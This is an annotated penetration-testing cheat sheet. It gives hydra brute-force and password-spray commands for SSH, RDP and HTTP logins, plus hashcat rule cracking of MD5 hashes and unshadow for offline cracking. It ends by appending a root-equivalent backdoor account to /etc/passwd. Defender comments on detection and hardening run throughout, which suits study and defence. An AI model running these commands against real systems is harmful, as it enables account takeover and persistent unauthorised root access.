SSH
# Single user brute-force
# -l sets one login name; -P reads candidate passwords from a file, one per line.
# Defender view: this shows up as a burst of failed logins for one account from
# one source in the sshd auth log. Key-only authentication, or rate limiting
# and lockout (e.g. fail2ban), blunts it.
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
# Password spray
# -L reads login names from a file; -p tries one fixed password against each.
# Each account sees only one attempt, so per-account lockout counters do not
# trip; detection has to correlate failures across accounts from one source.
hydra -L users.txt -p 'knownPassword123' ssh://<IP>
RDP
Spray a known password across users:
# Every login in users.txt (-L) is tried once with the single password given
# by -p against the RDP service on the target.
# Defender view: failed RDP logons are recorded as Windows Security event 4625;
# many accounts failing from one source address in a short window is the
# pattern to alert on.
hydra -L users.txt -p 'password' rdp://<IP>
HTTP POST Login Form
# Capture login fields and failed string using Burp or browser DevTools.
# The http-post-form argument has three colon-separated parts:
#   /login.php                        request path
#   username=<user>&password=^PASS^   POST body; ^PASS^ is replaced per attempt
#   Invalid login                     text whose presence marks a failed attempt
# If the failure text does not match what the application really returns,
# every attempt is reported as valid, so check it against a real failed login.
# Defender view: throttling per account and per source on the login endpoint,
# plus alerting on repeated failures, limits this.
hydra -l <user> -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login.php:username=<user>&password=^PASS^:Invalid login"
HTTP Basic Authentication
# HTTP Basic authentication on the path / : the login is fixed to admin (-l),
# passwords come from the wordlist (-P).
# Each attempt is a GET request carrying an Authorization header; failures
# typically appear as runs of 401 responses in the web server access log.
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-get /
Password Mutation with Hashcat Rules
# Appending Characters
# In a hashcat rule, $X appends the character X, so this one rule appends the
# five characters 1 @ 3 $ 5 to every wordlist entry. The single quotes stop
# the shell from expanding the $ sequences before they reach the file.
echo '$1$@$3$$$5' > append.rule
# Hash to test the rule against (32 hex characters).
echo '056df33e47082c77148dba529212d50a' > hash.txt
# -m 0 selects raw (unsalted) MD5; -r applies the rule file to each candidate.
# NOTE(review): --force makes hashcat ignore its own warnings and can mask
# driver or runtime problems that lead to wrong results; drop it unless the
# run genuinely fails without it.
# Defender view: a predictable suffix adds little against a fast unsalted
# hash; store passwords with a slow, salted scheme instead.
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt -r append.rule --force
# all letters uppercase and duplicating the password.
# u upper-cases the whole word, then d duplicates it
# (constructed example: pass -> PASS -> PASSPASS).
echo 'u d' > demo5.rule
# Hash to test the rule against (32 hex characters).
echo '19adc0e8921336d08502c039dc297ff8' > hash5.txt
# -m 0 selects raw (unsalted) MD5; -r applies demo5.rule to each candidate.
# NOTE(review): --force makes hashcat ignore its own warnings; drop it unless
# the run genuinely fails without it.
hashcat -m 0 hash5.txt /usr/share/wordlists/rockyou.txt -r demo5.rule --force
Shadow file insert
# print the shadow file, then:
# unshadow (shipped with John the Ripper) merges saved copies of passwd and
# shadow into one file of account lines with their hashes, for offline
# cracking. It only reads passwd.txt and shadow.txt and writes passwords.txt.
# Defender view: /etc/shadow should be readable by root only, so being able to
# print it at all points to a permission error or existing root access.
unshadow passwd.txt shadow.txt > passwords.txt
# create your hash to insert
# -1 selects MD5-crypt (the $1$ prefix), -salt fixes the salt to TOX, and
# password1 is the plaintext being hashed.
openssl passwd -1 -salt TOX password1
# output: $1$TOX$V1fTLRVUzjgeX/CWDacOc0
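# add this to the /etc/passwd file:
# Fields are name:password-hash:UID:GID:comment:home:shell; UID 0 and GID 0
# make the entry a root-equivalent account.
# The line must be single-quoted: inside double quotes the shell expands $1,
# $TOX and $V1fTLRVUzjgeX as (normally empty) variables and writes a corrupted
# hash field instead of the hash generated above.
# The append succeeds only where /etc/passwd is writable by the current user,
# which is itself the misconfiguration. Defenders can audit for extra UID 0
# entries and for hashes in the second field, and keep the file under
# integrity monitoring.
echo 'toxsec:$1$TOX$V1fTLRVUzjgeX/CWDacOc0:0:0:root:/root:/bin/bash' >> /etc/passwd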